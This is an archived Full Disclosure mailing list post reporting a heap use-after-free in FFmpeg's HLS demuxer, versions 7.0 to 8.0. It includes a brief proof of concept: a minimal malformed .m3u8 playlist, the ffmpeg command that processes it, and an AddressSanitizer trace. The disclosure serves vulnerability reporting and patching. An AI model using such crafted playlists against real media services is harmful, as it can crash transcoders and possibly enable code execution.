| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-GxqVt8Hw-Q-A2hqLnm5J7D2Tu-ECVkJE6vR35SW4TubaQ@mail.gmail.com> Date: Sun, 7 Sep 2025 01:31:45 -0400 From: Ron E <ronaldjedgerson@...il.com> To: fulldisclosure@...lists.org Subject: [FD] FFmpeg 7.0+ Heap Use-After-Free in FFmpeg HLS Demuxer (libavformat/utils.c) Malformed .m3u8 playlists can trigger a heap use-after-free when the HLS demuxer handles segment references. ASan reports access to freed memory inside libavformat/utils.c:528. A crafted .m3u8 could allow remote attackers to achieve denial of service (DoS), information disclosure, or potentially remote code execution depending on heap state. (FFmpeg 7.0-8.0) *Impact:* - Remote attackers can crash the transcoder with a malicious playlist. - Under certain heap layouts, this may be exploitable for arbitrary code execution. *Proof of Concept:* #EXTM3U #EXTINF:10, dummy.ts UBSAN_OPTIONS=print_stacktrace=1 ASAN_OPTIONS=abort_on_error=1 ./ffmpeg -i malicious.m3u8 -c copy out.mp4 ERROR: AddressSanitizer: heap-use-after-free on address 0x5080000000c8 READ of size 4 freed by thread T0 here: free() previously allocated by thread T0 here: posix_memalign() _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists